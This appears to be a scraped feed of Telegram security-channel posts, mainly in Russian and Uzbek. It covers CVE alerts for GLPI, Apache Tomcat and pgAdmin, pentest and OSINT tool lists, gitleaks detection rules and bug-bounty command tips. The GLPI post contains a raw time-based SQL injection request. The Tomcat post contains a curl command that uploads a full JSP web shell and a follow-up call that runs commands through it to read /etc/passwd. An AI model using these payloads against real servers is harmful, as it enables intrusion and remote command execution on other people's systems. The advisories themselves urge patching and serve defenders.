🚨 Снова #GLPI - Критическая уязвимость SQL-инъекции без аутентификации через /index.php/ajax/ CVE-2025-24799 и CVE-2025-24801
Позволяет удалённому атакующему выполнять произвольные SQL-запросы и потенциально эскалировать до RCE.
🛠️ Затрагивает версии до 10.0.18
✅ Исправлено в версии GLPI 10.0.18
🔍 PoC:
🧪 SQLi-сканер:
👉 https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main
📚 Подробности и пост-эксплуатация до RCE:
👉 https://blog.lexfo.fr/glpi-sql-to-rce.html
‼️ Если используете GLPI — обновитесь немедленно и проверьте логи на предмет активности на /ajax/.
#CVE
Позволяет удалённому атакующему выполнять произвольные SQL-запросы и потенциально эскалировать до RCE.
🛠️ Затрагивает версии до 10.0.18
✅ Исправлено в версии GLPI 10.0.18
🔍 PoC:
POST /index.php/ajax/ HTTP/1.1
Host: glpi
User-Agent: python-requests/2.32.3
Content-Type: application/xml
Content-Length: 232
<?xml version="1.0" encoding="UTF-8"?>
<xml>
<QUERY>get_params</QUERY>
<deviceid>', IF((1=1),(select sleep(5)),1), 0, 0, 0, 0, 0, 0);#</deviceid>
<content>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</content>
</xml>
🧪 SQLi-сканер:
👉 https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main
📚 Подробности и пост-эксплуатация до RCE:
👉 https://blog.lexfo.fr/glpi-sql-to-rce.html
‼️ Если используете GLPI — обновитесь немедленно и проверьте логи на предмет активности на /ajax/.
#CVE
👍1
Forwarded from SecuriXy.kz
🔥 Path Equivalence в Apache Tomcat CVE-2025-24813
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.
💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99
🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).
📦 PoC:
📥 Доступ к вебшеллу:
📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg
‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.
⛔ Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.
💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99
🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).
📦 PoC:
curl -X PUT "https://target.com/uploads/../webapps/ROOT/updates.jsp" \
-H "Content-Type: application/x-jsp" \
--data-raw '<%@ page import="java.io.*" %>
<html><body>
<form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form>
<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %>
</body></html>' -i
📥 Доступ к вебшеллу:
curl "https://target.com/updates.jsp?cmd=cat/etc/passwd" -i
📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg
‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.
⛔ Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.
Forwarded from SecuriXy.kz
💣 pgAdmin RCE CVE-2025-2945 -
Удалённое выполнение кода (RCE) в одном из самых популярных GUI-интерфейсов для PostgreSQL.
Актуально для всех версий pgAdmin ≤ 9.1
🧠 Уязвимость кроется в eval() - опасной функции, интерпретирующей строки как исполняемый код.
🎯 Уязвимые endpoints:
📌 Условия эксплуатации:
Нужна аутентификация
POST-запросы к указанным маршрутам
📉 Потенциал:
Полный захват сервера, выполнение произвольных команд, возможность lateral movement внутри инфраструктуры.
🔗 Подробнее: 👉 https://py0zz1.tistory.com/entry/Remote-Code-Execution-Vulnerability-in-pgAdmin-CVE-2025-2945
https://www.youtube.com/watch?v=V2WzCmRct7s
Удалённое выполнение кода (RCE) в одном из самых популярных GUI-интерфейсов для PostgreSQL.
Актуально для всех версий pgAdmin ≤ 9.1
🧠 Уязвимость кроется в eval() - опасной функции, интерпретирующей строки как исполняемый код.
🎯 Уязвимые endpoints:
/sqleditor/query_tool/download/<int:trans_id>
/cloud/deploy
📌 Условия эксплуатации:
Нужна аутентификация
POST-запросы к указанным маршрутам
📉 Потенциал:
Полный захват сервера, выполнение произвольных команд, возможность lateral movement внутри инфраструктуры.
🔗 Подробнее: 👉 https://py0zz1.tistory.com/entry/Remote-Code-Execution-Vulnerability-in-pgAdmin-CVE-2025-2945
https://www.youtube.com/watch?v=V2WzCmRct7s
👍1
Forwarded from Codeby
go install -v github.com/projectdiscovery/mapcidr/cmd/mapcidr@latest.Генерация списка IP-адресов для заданного CIDR или диапазона IP:
mapcidr -cidr 192.168.0.0/24
echo "192.168.0.0-192.168.0.5" | mapcidr
Разделение заданного CIDR на подсети по заданному количеству CIDR(-sbc 10):
mapcidr -cidr 173.0.84.0/24 -sbc 10 -silent
Разделение заданного CIDR на подсети по по количеству хостов в каждой из них(-sbh 20000):
mapcidr -cidr 173.0.84.0/16 -sbh 20000 -silent
Идеальное разделение возможно только в том случае, если желаемое количество сегментов или хостов в подсети является степенью двойки. В противном случае инструмент попытается автоматически найти наилучшую стратегию разделения для достижения желаемого результата.
Представление заданного IP-адреса в десяти поддерживаемых уникальных форматах
echo 192.168.1.154 | mapcidr -if 0 -silent
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Suggested tools for performing AWS penetration testing
https://github.com/aws/aws-cli
https://docs.aws.amazon.com/cli/latest/reference/#cli-aws
https://github.com/prowler-cloud/prowler
https://github.com/NetSPI/aws_consoler
https://github.com/zer1t0/awsenum
https://github.com/andresriancho/enumerate-iam
https://github.com/nccgroup/ScoutSuite
https://github.com/carnal0wnage/weirdAAL
https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting
#AWS #Tools #Pentest
https://github.com/aws/aws-cli
https://docs.aws.amazon.com/cli/latest/reference/#cli-aws
https://github.com/prowler-cloud/prowler
https://github.com/NetSPI/aws_consoler
https://github.com/zer1t0/awsenum
https://github.com/andresriancho/enumerate-iam
https://github.com/nccgroup/ScoutSuite
https://github.com/carnal0wnage/weirdAAL
https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting
#AWS #Tools #Pentest
GitHub
GitHub - aws/aws-cli: Universal Command Line Interface for Amazon Web Services
Universal Command Line Interface for Amazon Web Services - aws/aws-cli
Forwarded from AppSec Guy
CVE yoki CWE dasturlari tugatilishi yaxshigina impact ko'rsatadi, AppSecga ayniqsa.
Yangi chiqqan vulnerability lar track qilinib unga raqami berilmaydi, masalan CVE-2025-12345 qilib. O'zi bundan muammo yo'qqa o'xshaydi Shaptolini shu versiyasida ATO deb yozib ketaveramiz vulnerability nomini, lekin baribir confusion bo'ladi.
Impact to'g'ridan-tog'ri bizga bilinmaydi, bundan ko'proq U.S. foydalanadi o'zini assetlarida.
Yana CVE database bilan ishlaydigan Vulnerability Scanner lar ancha qiynaladi.
Lekin CWE tugatilishi katta "chaos" bo'lsa kerak) OWASP faqat 10 ta vulnerability type ko'rsatadi, vulnerability ni mana shu deb ko'rsatgani CWE yaxshi.
Hullas bu framework bilan standartlar edi dunyo shunga qarab ish qiladigan, endi aniq narsa bo'lmasa tartibsizlik bo'ladi.
P.S. CVE assignment yoniq qolarkan)
@AppSec_guy
Yangi chiqqan vulnerability lar track qilinib unga raqami berilmaydi, masalan CVE-2025-12345 qilib. O'zi bundan muammo yo'qqa o'xshaydi Shaptolini shu versiyasida ATO deb yozib ketaveramiz vulnerability nomini, lekin baribir confusion bo'ladi.
Impact to'g'ridan-tog'ri bizga bilinmaydi, bundan ko'proq U.S. foydalanadi o'zini assetlarida.
Yana CVE database bilan ishlaydigan Vulnerability Scanner lar ancha qiynaladi.
Lekin CWE tugatilishi katta "chaos" bo'lsa kerak) OWASP faqat 10 ta vulnerability type ko'rsatadi, vulnerability ni mana shu deb ko'rsatgani CWE yaxshi.
Hullas bu framework bilan standartlar edi dunyo shunga qarab ish qiladigan, endi aniq narsa bo'lmasa tartibsizlik bo'ladi.
P.S. CVE assignment yoniq qolarkan)
@AppSec_guy
image_2025-04-18_12-51-13.png
159.8 KB
ncdu — diskdagi bo‘sh joyni tahlil qilish uchun eng qulay vositalardan biri hisoblanadi. Uda yarim-grafikli interfeys mavjud, bu bizga ishlashni ancha osonlashtiradi.
ncdu Linux distributivlarida odatda oldindan o‘rnatilmagan bo‘ladi.
How to install and use:
#ncdu
ncdu Linux distributivlarida odatda oldindan o‘rnatilmagan bo‘ladi.
How to install and use:
apt install ncdu
ncdu /
#ncdu
🔥1
Forwarded from OSINT
Mr.Holmes: комплексный инструмент для OSINT-анализа
#OSINT
Mr.Holmes — многофункциональный инструмент для сбора информации по IP-адресам, доменам, email, геолокации и другим данным. Поддерживает работу в Linux, macOS, Windows и Termux. Полезен для пентестеров, специалистов по безопасности и исследователей.
🔗 Исходный код: GitHub
LH | News | OSINT | AI
#OSINT
Mr.Holmes — многофункциональный инструмент для сбора информации по IP-адресам, доменам, email, геолокации и другим данным. Поддерживает работу в Linux, macOS, Windows и Termux. Полезен для пентестеров, специалистов по безопасности и исследователей.
LH | News | OSINT | AI
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Cat Seclist
BlackOps Field Exploiter v2.1
A comprehensive penetration testing and CTF toolkit powered by Gemini AI for enhanced vulnerability analysis.
https://github.com/liyander/blackops-field-vulnerability-exploiter
A comprehensive penetration testing and CTF toolkit powered by Gemini AI for enhanced vulnerability analysis.
https://github.com/liyander/blackops-field-vulnerability-exploiter
Forwarded from Codeby
Getleak — это инструмент с открытым исходным кодом, предназначенный для обнаружения утечек конфиденциальных данных в репозиториях Git. Он помогает выявлять ключи API, пароли, токены доступа и другую чувствительную информацию, которая могла быть случайно добавлена в код.
Основные возможности
git clone https://github.com/gitleaks/gitleaks
cd gitleaks
go install
gitleaks detect --source=<путь_к_репозиторию>
Пример конфигурации кастомного файла
custom-rules.json с правилами сканирования{
"rules": [
{
"description": "API Key Detection",
"regex": "AKIA[0-9A-Z]{16}",
"tags": ["key", "AWS"]
},
{
"description": "Generic Password",
"regex": "(?i)(password|pwd|pass)\\s*[=:]\\s*['\"]?[a-zA-Z0-9@#\\$%\\^&\\*]+['\"]?",
"tags": ["password"]
}
]
}gitleaks detect --source=<путь_к_репозиторию> --config=custom-rules.json
Please open Telegram to view this post
VIEW IN TELEGRAM
Security-Tip
Replace your basic dirsearch fuzz command with this combination
dirsearch -u https://example.com -e
php,html,js,json,txt,xml,zip,sql,asp,aspx,jsp,action,conf ,config,bak,log, old, inc -x 400,403,404 -t 50 --recursion "404"
Hope this helps
Replace your basic dirsearch fuzz command with this combination
dirsearch -u https://example.com -e
php,html,js,json,txt,xml,zip,sql,asp,aspx,jsp,action,conf ,config,bak,log, old, inc -x 400,403,404 -t 50 --recursion "404"
Hope this helps
🔥2
Find hidden GET parameters in javascript files
assetfinder https://example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done
#BugBountytip
assetfinder https://example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done
#BugBountytip
👍1
Forwarded from Cat Seclist
[ Scopify - the "Netify" Reconnaissance Tool ]
Scopify is a Python command-line tool designed for penetration testers and bug bounty hunters to quickly gather and analyze infrastructure information (CDN, Hosting, SaaS) for a target company by scraping netify.
It optionally leverages OpenAI's API to provide AI-driven analysis of the gathered infrastructure, highlighting potential areas of interest and suggesting reconnaissance methodologies.
By Jason Haddix.
🔗Tool: https://github.com/Arcanum-Sec/Scopify
Scopify is a Python command-line tool designed for penetration testers and bug bounty hunters to quickly gather and analyze infrastructure information (CDN, Hosting, SaaS) for a target company by scraping netify.
It optionally leverages OpenAI's API to provide AI-driven analysis of the gathered infrastructure, highlighting potential areas of interest and suggesting reconnaissance methodologies.
By Jason Haddix.
🔗Tool: https://github.com/Arcanum-Sec/Scopify